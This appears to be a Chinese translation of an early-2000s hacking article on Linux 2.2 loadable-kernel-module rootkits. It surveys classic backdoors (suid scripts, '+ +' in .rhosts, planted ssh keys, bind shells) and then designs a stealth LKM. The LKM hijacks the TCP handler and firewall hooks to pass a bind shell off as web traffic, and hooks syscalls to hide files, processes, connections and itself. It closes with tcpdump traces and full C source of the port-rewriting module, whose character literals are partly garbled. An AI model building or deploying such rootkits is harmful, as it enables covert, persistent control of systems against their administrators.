简介: 在这篇文章里, 我们将看到各种不同的后门技术,特别是linux的可装载内核模块(LKM)。 我们将会发现lkm后门比传统的后门程序更加复杂,更加强大,更不易于被发现。知道这些之后,我们可以制造我们自己的基于lkm的rootkit程序, 主要体现在tcp/ip层, 因为我们相信这是在系统管理员面前最好的隐藏后门的地方。
----[ 序言。
在一些黑客组织中, rootkit (或者backdoor) 是一个非常感兴趣的话题。 各种不同的rootkit被开发并发布在internet上。在这些rootkit之中, LKM尤其被人关注, 因为它是利用现代操作系统的模块技术。作为内核的一部分运行,这种rootkit将会越来越比传统技术更加强大更加不易被发觉。一旦被安装运行到目标机器上, 系统就会完全被控制在hacker手中了。甚至系统管理员根本找不到安全隐患的痕迹, 因为他们不能再信任它们的操作系统了。
本文章以及我们开发的一些强大的lkm程序都是基于linux kernel 2.2.x版本的。我们的目的是尽可能多的隐藏足迹。
在接下来的一部分, 我们将介绍一下已经存在的后门技术, 然后和lkm技术相比较, 最后讨论我么的lkm程序的设计与实现。
----[ 已存在的后门技术 - 系统管理员的悲惨世界。~0~
后门程序的目的就是甚至系统管理员企图弥补系统漏洞的时候也可以给hacker系统的访问权限。
后门程序使本地用户取得root权限可以这样做: 设置uid程序, 系统木马程序, cron后门。
1. 设置uid程序。 黑客在一些文件系统理放一些设置uid脚本程序。无论何时它们只要执行这个程序它们就会成为root。
2. 系统木马程序。黑客替换一些系统程序,
如"login"程序。因此, 只要满足一定的条件,那些程序就会给黑客最高权限。
3. Cron 后门。黑客在cron增加或修改一些任务,
在某个特定的时间程序运行,他们就可以获得最高权限。
后门程序给远程用户以最高访问权限可以这样做: ".rhost" 文件, ssh认证密钥, bind shell, 木马服务程序。
1. ".rhosts" 文件。一旦 "+ +"被加入某个用户的.rhosts文件里, 任何人在任何地方都可以用这个账号来登陆进来而不需要密码。
2. ssh 认证密钥。黑客把他自己的公共密钥放到目标机器的ssh配置文件"authorized_keys"里, 他可以用该账号来访问机器而不需要密码。
3. Bind shell。黑客绑定一个shell到一个特定的tcp端口。任何人telnet这个端口都可以获得交互的shell。更多精巧的这种方式的后门可以基于udp,或者未连接的tcp, 甚至icmp协议。
4. Trojaned服务程序。任何打开的服务都可以成为木马来为远程用户提供访问权限。例如, 利用inetd服务在一个特定的端口来创建一个bind shell,或者通过ssh守护进程提供访问途径。
在入侵者植入和运行后门程序之后, 他会找一些方法和系统管理员开一些善意的玩笑。这主要涉及到两个方面问题: 如何来隐藏他的文件且如何来隐藏他的进程。
为了隐藏文件, 入侵者需要做如下事情: 替换一些系统常用命令如"ls", "du", "fsck"。在底层方面, 他们通过把硬盘里的一些区域标记为坏块并把它的文件放在那里。或者如果他足够疯狂,他会把一些文件放入引导块里。
为了隐藏进程, 他可以替换 "ps"程序, 或者通过修改argv[]来使程序看起来象一个合法的服务程序。有趣的是把一个程序改成中断驱动的话,它就不会出现在进程表里了。
----[ LKM - 还有比这个更臭屁的么?
我们已经看到过一些常规的技术。现在的问题是: 系统管理员可以找出它们么?实际上, 一个好的系统管理员可以很轻易的找出它们中的%99。 问题是入侵者必须修改或者创建一些重要文件。 如果系统管理员保存一份"tripwire"数据库, 通过这些可以确定安全隐患的存在。通过浏览文件系统可以去掉suid程序, ".rhosts" 文件, 等。
相反, 利用lkm我们可有效的突破这些限制。首先,我们在重要的系统目录里不必修改或创建任何文件。我们可以把lkm程序放在/tmp或/var/tmp目录下, 一般系统管理员是不会监视这些目录的。 其次, 我们可以隐藏我们想要的任何东西, 象文件, 进程, 和网络连接。 因为要得到这些信息, 用户必须依赖系统调用。
因此我们可以修改内核结构, 我们可以用我们自己的函数来替换原系统调用。最后,我们甚至可以攻击或修改tcp/ip协议栈并且去愚弄系统内核!
以下部分,我们将介绍如何利用这些机制以及实现方法。
----[ 我们的LKM - "Kicking Kernel Ass From Left to Right" [3]
我们的lkm程序主要是基于linux kernel 2.2.x及tcp/ip上的实现, 因为一个优秀的后门程序一定会给远程用户访问该系统的权限。在目标机器上打开一个端口,运行一个服务是非常容易暴露的。我们需要尽可能的隐藏自己。
第一个想法是我们在目标机器上不运行任何进程来等待连接,我们在tcp/ip协议栈里来创建一个函数来替代它。 无论何时一个特殊的udp或tcp包被接受,内核将会检查这个包来确定是否是指定的特殊包。假如是的话, 内核将派生一个进程来执行命令。我们可以使用任何内核可以支持的协议包。
现在我们来实现它。在内核里, 每个协议在*inet_protocol_base和*inet_protos[MAX_INET_PROTOS]
hash注册自己。 当系统初始化时, 所有支持的协议会再inet_protocol_base注册。他们被加到inet_protos的哈希表里。不管什么时候一个IP包达到时, 内核将检查这个哈希表,找相应的处理函数和系统调用。我们就在这个点上进行hack。我们将用我们的处理函数来替换原始的协议的处理函数。因此,我们可以截获数据包并且分析它。假如它是我们需要的, 我们将执行我们的命令。 假如不是,仅仅只需要调用原来的函数。
我们同时处理TCP和UDP的原因是假如那里有一些防火墙的话,UDP可能不能穿过。因此,我们只需要发一个源地址被伪造的数据包到目的机子。此外,对于TCP的数据包,它也不需要使用SYN位。事实上,现在我们的客户程序使用的是ACK的包。
第二个想法更使人感兴趣。 如果一台目标的机子上有个WEB的服务并且安了一个只允许WEB通信的防火墙,那么我们如何来穿过它呢? 我们能否得到一个交互的shell呢?答案是肯定的。方法如下:
____________ _________________________
| 攻击者 | | web server |
| | | 80 <=======> 53333 |
|__________| |_______________________|
| |
| |
|_____________________________________|
1025 ==> 80 or 1025 <== 80
假设我们在web服务器上已经绑定了一个bind shell后门并且监听53333端口(可以利用第一个方法来完成)
现在我们需要把攻击者到web服务器上的流量从80端口重定向到53333端口, 从53333端口到攻击者的流量必须被改成80端口。
实现部分。改变接收的包是很容易的, 我们可以借用第一个lkm的思路- 无论何时我们都检查到来的tcp包如果必要我们修改它的目的端口。为了改变发出的包, 这就有点困难了。 因为tcp/ip协议栈的实现涉及到linux内核的一些底层的静态函数。它不太容易被置换(但是是可能的, 细节参见附录)。 我们利用的是大部分发布时就被编译进内核中的防火墙。每个到来的包,转发的包, 或发出的包必须通过防火墙。并且防火墙函数是可以被动态地加载到内核里的!我们利用系统导出函数register_firewall() 在系统防火墙规则之前插入我们自己的规则。假如我们发现一些来自于53333端口的包, 我们可以自动改变它到80。
关于此实现的另外的细节是无论何时我们改变数据包, 我们必须去重新计算校验和。 更有趣的事情是我们可以在web服务器和其他一些机器上监听网络流量,我们可以看到他们的不同之处。 在其他机器上的sniffer看起来象普通的web流量, 但是在web服务器上的sniffer是一些无用的流量纪录。具体细节参见附录。
现在我们谈一下如何来截获系统调用。为了隐藏入侵者的足迹, 文件, 进程,网络连接必须隐藏起来。 因为这些信息都是可以从特殊的系统调用里面获得的, 我们可以接获一些感兴趣的系统调用。
1. 隐藏文件。象这些命令如"ls", "du" 使用sys_getdents() 来获得目录信息。 所以lkm程序必须过滤这些输出来达到隐藏文件的目的。
2. 隐藏进程。在linux的实现中,进程的信息被映射到/proc文件系统去了。我们的工作仍旧是捕获sys_getdents()调用在进程链表中标记为不可见。通常的手法是设置任务的信号标志位为一些未用的信号量,比如31就是一个例子。
3. 隐藏网络连接。 和隐藏进程相似, 在这个例子中我们是这去隐藏一些包括/proc/net/tcp和/proc/net/udp的文件。所以我们改变sys_read()。 无论何时读包含匹配字符串的这两个文件的时候, 系统调用将不会声明在使用它。
4. 重定向可执行文件。 有时候, 入侵者可能会需要替换系统的二进制文件, 象"login", 但不想改变原文件。他可以截获sys_execve()。因此, 无论何时系统尝试去执行"login"程序的时候, 它都会被重定向到入侵者给定的其他程序。
5. 隐藏sniffer。这儿我们指隐藏网络接口的杂拨模式。在这里我们要替换的是sys_ioctl()。
6. 和lkm通信。 黑客已经很好的安装了他的lkm。现在他需要告诉内核来隐藏其他文件。他该怎么做呢?我们知道从用户态切换到和心态通常是通过系统调用来进行的, 所以我们必须修改一些系统调用。
例如, 我们将截获sys_settimeofday()。当一个指定的参数被传递, 我们的系统调用将会为我们做一些适当的事情。
7. 隐藏lkm本身。一个优秀的lkm程序必须很好地隐藏它自己。系统里的lkm是用单向链表连接起来的, 为了隐藏lkm本身我们必须把它从链表中移走以至于lsmod这样的命令不能把它显示出来。
8. 隐藏符号表。通常的lkm中的函数将会被导出以至于其他模块可以使用它。因为我们是入侵者, 所以隐藏这些符号是必须的。幸运的是, 有一个宏可以供我们使用:"EXPORT_NO_SYMBOLS"。 把这个宏放在lkm的最后可以防止任何符号的输出。
----[ 经验和结论。
做个lkm程序是一个非常有趣而又非常危险的事情。有趣的是你可以在系统内核中作你想做的事情。 但这也是非常危险的, 它可以使你的服务陷入混乱, 破坏你的数据, 并且可以在你的系统里做任何怪异的事情。 我们的经验有: 在安装了lkm程序几天后我们的网络层不工作了, 只工作五分钟就要重起一次; 无论何时发送数据包, 象这些应用程序 telnet, netscape, pine都将会产生core dump; 在安装lkm程序后立马重起。所以, 就象标题所说的那样,后果自负!
值得一提的是写一个lkm程序你可以更好地了解到系统是如何工作的。例如, /proc文件系统有很好的特性。因为lkm程序工作在内核空间, 调试lkm程序就变得比一般程序要困难。 使用"printk"函数可以解决一些问题。但这不是最好的解决方法。通过注册在/proc文件系统里的我们的文件和目录的数据结构, 我们可以访问到任何时间的内核空间的信息。我们甚至可以通过写这个文件来修改内存, 尽管一般不建议这样做。
结束语。 从经验来看, 很明显的lkm程序可以在linux上安装,一旦系统被攻破并且被安装了lkm的rootkit程序, 这就变的很难被发现了。因为甚至操作系统都不能信任了。如果机器不允许关机,唯一的发现入侵者的方法是通过分析在网络其他机器上的sniffer结果。 或者, 利用其他的操作系统来监测硬盘。所有这两个方法都很难去做, 因为你不知道你要找什么。
所以,所以最好的安全措施就是防止被攻击者入侵系统。
----[ 参考资料。
1. Bypassing Integrity Checking Systems. http://phrack.infonexus.com/search.phtml?view&article=p51-9
2. Weakening the Linux Kernel. http://phrack.infonexus.com/search.phtml?view&article=p52-18
3. Building Into The Linux Network Layer. http://phrack.infonexus.com/search.phtml?view&article=p55-12
4. (nearly) Complete Linux Loadable Kernel Modules. http://packetstorm.securify.com/groups/thc/LKM_HACKING.html
5. Backdoors. http://www.dataguard.no/bugtraq/1997_3/0310.html
6. Runtime Kernel Kmem Patching. http://www.big.net.au/~silvio/runtime-kernel-kmem-patching.txt
----[附录
1. 替换协议例程来改变发送数据包。
在linux内核中,每个BSD socket 在内核结构中实际上是一对socket/sock。发送数据包的例程是利用sock结构中的tcp_opt*成员来实现的, 轮流使用af_specific成员。有意思的是这里所有的ipv4都使用相同的地址, 例如, 所有的af_specific 将指向同样的内核地址, 这个结构地址保存了一个例程集合。我们怎么在"tcp_func"这个实力中修改函数地址呢?
方法很简单, 但实现起来却不那么容易。因为没有一个很简单的方法去得到那个结构的地址。一个可能的方法是:
从进程链表(任务结构链表)中找出它打开的文件; 然后从这些文件中找出实际指向socket的地址; 从socket可以得到sock结构地址; 最后获得"ipv4_specific"的地址。
我们来理顺以下上面所说的流程: task -> files_struct
-> file -> inode -> socket -> sock -> tcp_opt -> tcp_func.
其他的方法就更加困难和危险了。这个灵感是来自于[6]。我们可以通过搜索内核内存来找到我们要的明确的函数地址。然后修改内核内存。首先我们跳转到我们代码的地址然后跳回常规例程。
2. 从web服务器和从网络工作站上的流量监听。
在这段中, mamet是一个装了我们的后门的服务器且leone是一个攻击者。
开始的tcpdump输出纪录了除了mamet之外的一些网络工作站的流量。我们可以烦先这时正常的。leone的2603端口 和mamet的80端口的通信:
14:16:27.214888 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: S
3840116896:3840116896(0) win 32120 <mss 1460,sackOK,timestamp 14616818
0,nop,wscale 0> (DF)
14:16:27.215190 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: S
3561828491:3561828491(0) ack 3840116897 win 32120 <mss 1460,sackOK,timestamp
1547802 14616818,nop,wscale 0> (DF)
14:16:27.215336 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: .
1:1(0) ack 1 win 32120 <nop,nop,timestamp 14616819 1547802> (DF)
14:16:27.313396 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
1:39(38) ack 1 win 32120 <nop,nop,timestamp 1547812 14616819> (DF)
14:16:27.313539 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: .
1:1(0) ack 39 win 32120 <nop,nop,timestamp 14616828 1547812> (DF)
14:16:30.166613 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: P
1:6(5) ack 39 win 32120 <nop,nop,timestamp 14617114 1547812> (DF)
14:16:30.166895 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: .
39:39(0) ack 6 win 32120 <nop,nop,timestamp 1548097 14617114> (DF)
14:16:30.190287 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
39:127(88) ack 6 win 32120 <nop,nop,timestamp 1548099 14617114> (DF)
14:16:30.205280 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: .
6:6(0) ack 127 win 32120 <nop,nop,timestamp 14617118 1548099> (DF)
14:16:30.205548 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
127:157(30) ack 6 win 32120 <nop,nop,timestamp 1548101 14617118>
(DF)14:16:30.225281 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: .
6:6(0) ack 157 win 32120 <nop,nop,timestamp 14617120 1548101> (DF)
14:16:35.664222 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: P
6:17(11) ack 157 win 32120 <nop,nop,timestamp 14617663 1548101> (DF)
14:16:35.676943 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
157:236(79) ack 17 win 32120 <nop,nop,timestamp 1548648 14617663> (DF)
14:16:35.695279 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: .
17:17(0) ack 236 win 32120 <nop,nop,timestamp 14617667 1548648> (DF)
14:16:35.695561 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
236:266(30) ack 17 win 32120 <nop,nop,timestamp 1548650 14617667> (DF)
14:16:35.715282 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: .
17:17(0) ack 266 win 32120 <nop,nop,timestamp 14617669 1548650> (DF)
14:16:40.099813 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: P
17:23(6) ack 266 win 32120 <nop,nop,timestamp 14618107 1548650> (DF)
14:16:40.103771 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
266:300(34) ack 23 win 32120 <nop,nop,timestamp 1549091 14618107> (DF)
14:16:40.115282 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: .
23:23(0) ack 300 win 32120 <nop,nop,timestamp 14618109 1549091> (DF)
14:16:42.196173 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: P
23:30(7) ack 300 win 32120 <nop,nop,timestamp 14618317 1549091> (DF)
14:16:42.199260 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: F
300:300(0) ack 30 win 32120 <nop,nop,timestamp 1549300 14618317>
(DF)14:16:42.199399 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: .
30:30(0) ack 301 win 32120 <nop,nop,timestamp 14618317 1549300> (DF)
14:16:42.199806 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: F
30:30(0) ack 301 win 32120 <nop,nop,timestamp 14618317 1549300> (DF)
14:16:42.200052 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: .
301:301(0) ack 31 win 32120 <nop,nop,timestamp 1549300 14618317> (DF)
这儿是在服务器上收集的同一会话的跟踪线索。 当用lenone的2603端口来试图和mamet的53333端口通信时,这看起来好像比较奇怪。 这儿有一些外来的数据包,实际上它们是被修改过的。
14:12:16.042692 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: S
3840116896:3840116896(0) win 32120 <mss 1460,sackOK,timestamp 14616818
0,nop,wscale 0> (DF)
14:12:16.042844 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: S
3561828491:3561828491(0) ack 3840116897 win 32120 <mss 1460,sackOK,timestamp
1547802 14616818,nop,wscale 0> (DF)
14:12:16.043136 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: .
3840116897:3840116897(0) ack 3561828492 win 32120 <nop,nop,timestamp 14616819
1547802> (DF)
14:12:16.141022 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
1:39(38) ack 1 win 32120 <nop,nop,timestamp 1547812 14616819> (DF)
14:12:16.141340 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: .
0:0(0) ack 39 win 32120 <nop,nop,timestamp 14616828 1547812> (DF)
14:12:18.994434 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: P
0:5(5) ack 39 win 32120 <nop,nop,timestamp 14617114 1547812> (DF)
14:12:18.994567 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: .
39:39(0) ack 6 win 32120 <nop,nop,timestamp 1548097 14617114> (DF)
14:12:19.017933 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
39:127(88) ack 6 win 32120 <nop,nop,timestamp 1548099 14617114> (DF)
14:12:19.033100 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: .
5:5(0) ack 127 win 32120 <nop,nop,timestamp 14617118 1548099> (DF)
14:12:19.033222 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
127:157(30) ack 6 win 32120 <nop,nop,timestamp 1548101 14617118>
(DF)14:12:19.053099 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: .
5:5(0) ack 157 win 32120 <nop,nop,timestamp 14617120 1548101> (DF)
14:12:24.492064 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: P
5:16(11) ack 157 win 32120 <nop,nop,timestamp 14617663 1548101> (DF)
14:12:24.504619 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
157:236(79) ack 17 win 32120 <nop,nop,timestamp 1548648 14617663> (DF)
14:12:24.523115 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: .
16:16(0) ack 236 win 32120 <nop,nop,timestamp 14617667 1548648> (DF)
14:12:24.523259 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
236:266(30) ack 17 win 32120 <nop,nop,timestamp 1548650 14617667> (DF)
14:12:24.543124 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: .
16:16(0) ack 266 win 32120 <nop,nop,timestamp 14617669 1548650> (DF)
14:12:28.927675 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: P
16:22(6) ack 266 win 32120 <nop,nop,timestamp 14618107 1548650> (DF)
14:12:28.931467 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
266:300(34) ack 23 win 32120 <nop,nop,timestamp 1549091 14618107> (DF)
14:12:28.943147 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: .
22:22(0) ack 300 win 32120 <nop,nop,timestamp 14618109 1549091> (DF)
14:12:31.024044 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: P
22:29(7) ack 300 win 32120 <nop,nop,timestamp 14618317 1549091> (DF)
14:12:31.026978 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: F
300:300(0) ack 30 win 32120 <nop,nop,timestamp 1549300 14618317>
(DF)14:12:31.027268 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: .
29:29(0) ack 301 win 32120 <nop,nop,timestamp 14618317 1549300> (DF)
14:12:31.027669 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: F
29:29(0) ack 301 win 32120 <nop,nop,timestamp 14618317 1549300> (DF)
14:12:31.027780 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: .
301:301(0) ack 31 win 32120 <nop,nop,timestamp 1549300 14618317> (DF)
如果你有足够的创造力, 你甚至可以让sniffer不能sniffer到你的通信。在这个例子中, 在mamet上的sniffer将不能看到来自于leone机器的网络连接。
3. file "test.c"
/*
* Compile:
* gcc -O2 -c test.c -I/usr/src/linux/include -fomit-frame-pointer
*
* Usage:
* insmod test.o ip=128.111.48.44
* here ip is the attackers IP and must be in numeric format
*/
#define MODULE
#define __KERNEL__
#include <linux/config.h>
#include <linux/module.h>
#include <linux/version.h>
#include <linux/skbuff.h>
#include <net/protocol.h>
#include <linux/netdevice.h>
#include <net/pkt_sched.h>
#include <net/tcp.h>
#include <net/ip.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/icmp.h>
#include <linux/firewall.h>
#include <linux/kernel.h>
#include <linux/mm.h>
#include <linux/file.h>
#include <asm/uaccess.h>
/* Define here if you want to swap ports also */
#define REALPORT 53333 /* port you which to communicate */
#define FAKEPORT 80 /* port that appears on the wire */
int my_tcp_v4_rcv(struct sk_buff *skb, unsigned short len);
__u32 in_aton(const char *);
int my_default_firewall(struct firewall_ops *this, int pf,
struct device *dev, void *phdr, void *arg, struct sk_buff **skb);
int my_call_out_firewall(struct firewall_ops *this, int pf,
struct device *dev, void *phdr, void *arg, struct sk_buff **skb);
unsigned long int magic_ip;
char *ip;
MODULE_PARM(ip, "s");
struct inet_protocol *original_tcp_protocol;
struct inet_protocol my_tcp_protocol =
{
&my_tcp_v4_rcv,
NULL,
NULL,
IPPROTO_TCP,
0,
NULL,
"TCP"
};
/*
* <linux/firewall.h>
*
* 18 struct firewall_ops
* 19 {
* 20 struct firewall_ops *next;
* 21 int (*fw_forward)(struct firewall_ops *this, int pf,
* 22 struct device *dev, void *phdr, void *arg, struct sk_buff **pskb);
* 23 int (*fw_input)(struct firewall_ops *this, int pf,
* 24 struct device *dev, void *phdr, void *arg, struct sk_buff **pskb);
* 25 int (*fw_output)(struct firewall_ops *this, int pf,
* 26 struct device *dev, void *phdr, void *arg, struct sk_buff **pskb);
* 27 / * Data falling in the second 486 cache line isn used directly
* 28 during a firewall call and scan, only by insert/delete and other
* 29 unusual cases
* 30 * /
* 31 int fw_pf; / * Protocol family * /
* 32 int fw_priority; / * Priority of chosen firewalls * /
* 33 };
*/
struct firewall_ops my_fw_ops=
{
NULL,
&my_default_firewall,
&my_default_firewall,
&my_call_out_firewall,
PF_INET,
5 /* We are a little bit larger than default firewall which is 0 */
};
int my_default_firewall(
struct firewall_ops *this,
int pf,
struct device *dev,
void *phdr,
void *arg,
struct sk_buff **skb)
{
return FW_SKIP;
}
/*
* When sending a packet out, if the destination address == magic_ip
* and source tcp port == real port, change source port to fake port
* and re-compute the checksum.
*/
int my_call_out_firewall(
struct firewall_ops *this,
int pf,
struct device *dev,
void *phdr,
void *arg,
struct sk_buff **skb)
{
struct sk_buff *sk = *skb;
struct iphdr *iph = (struct iphdr *) phdr;
struct tcphdr *th = (struct tcphdr *)((__u32 *)iph+iph->ihl);
unsigned short size;
int doff = 0;
int csum = 0;
int offset;
if ( iph->daddr == magic_ip &&
iph->protocol == IPPROTO_TCP &&
th->source == htons(REALPORT) ) {
th->source = htons(FAKEPORT);
size = ntohs(iph->tot_len) - (iph->ihl * 4);
doff = th->doff << 2;
sk->csum = 0;
csum = csum_partial( sk->h.raw + doff, size - doff, 0 );
sk->csum = csum;
th->check = 0;
th->check = csum_tcpudp_magic(
iph->saddr,
iph->daddr,
size,
iph->protocol,
csum_partial(sk->h.raw, doff, sk->csum)
);
}
return FW_SKIP;
}
/*
* When receving a packet here, if the source IP == magic_ip and
* destination port == fake port, change the destination port to
* real port and re-compute the checksum.
* Call the original routine.
*/
int my_tcp_v4_rcv(struct sk_buff *skb, unsigned short len)
{
struct tcphdr *th;
struct iphdr *iph;
unsigned short size;
int doff = 0;
int csum = 0;
int offset;
if (
skb->nh.iph->saddr == magic_ip &&
skb->h.th->dest == htons(FAKEPORT) ) {
skb->h.th->dest = htons(REALPORT);
th = skb->h.th;
iph = skb->nh.iph;
size = ntohs(iph->tot_len) - (iph->ihl * 4);
doff = th->doff << 2;
skb->csum = 0;
csum = csum_partial( skb->h.raw + doff, size - doff, 0 );
skb->csum = csum;
th->check = 0;
th->check = csum_tcpudp_magic(
iph->saddr,
iph->daddr,
size,
iph->protocol,
csum_partial(skb->h.raw, doff, skb->csum)
);
}
out:
return (original_tcp_protocol->handler) ( skb, len );
}
/*
* Convert an ASCII string to binary IP.
*/
__u32 in_aton(const char *str) {
unsigned long l;
unsigned int val;
int i;
l = 0;
for (i = 0; i < 4; i++) {
l <<= 8;
if (*str != ) {
val = 0;
while (*str != && *str != .) {
val *= 10;
val += *str - ;
str++;
}
l |= val;
if (*str != )
str++;
}
}
return (htonl(l));
}
int init_module() {
if(!ip) {
printk("Error: missing end-host ip. ");
printk("Usage: insmod test.o ip=x.x.x.x ");
return -ENXIO;
}
magic_ip = in_aton(ip);
/* replace the original tcp protocol */
inet_add_protocol(&my_tcp_protocol);
original_tcp_protocol = my_tcp_protocol.next;
inet_del_protocol(original_tcp_protocol);
/* insert our firewall routines here */
if ( register_firewall( PF_INET, &my_fw_ops ) < 0 ) {
printk("panic: can load my firewall! ");
}
printk("test loaded ");
return 0;
}
void cleanup_module() {
/* remove our tcp routine, insert the original one */
inet_add_protocol(original_tcp_protocol);
inet_del_protocol(&my_tcp_protocol);
/* remove our firewall routine */
unregister_firewall( PF_INET, &my_fw_ops );
printk("test unloaded ");
}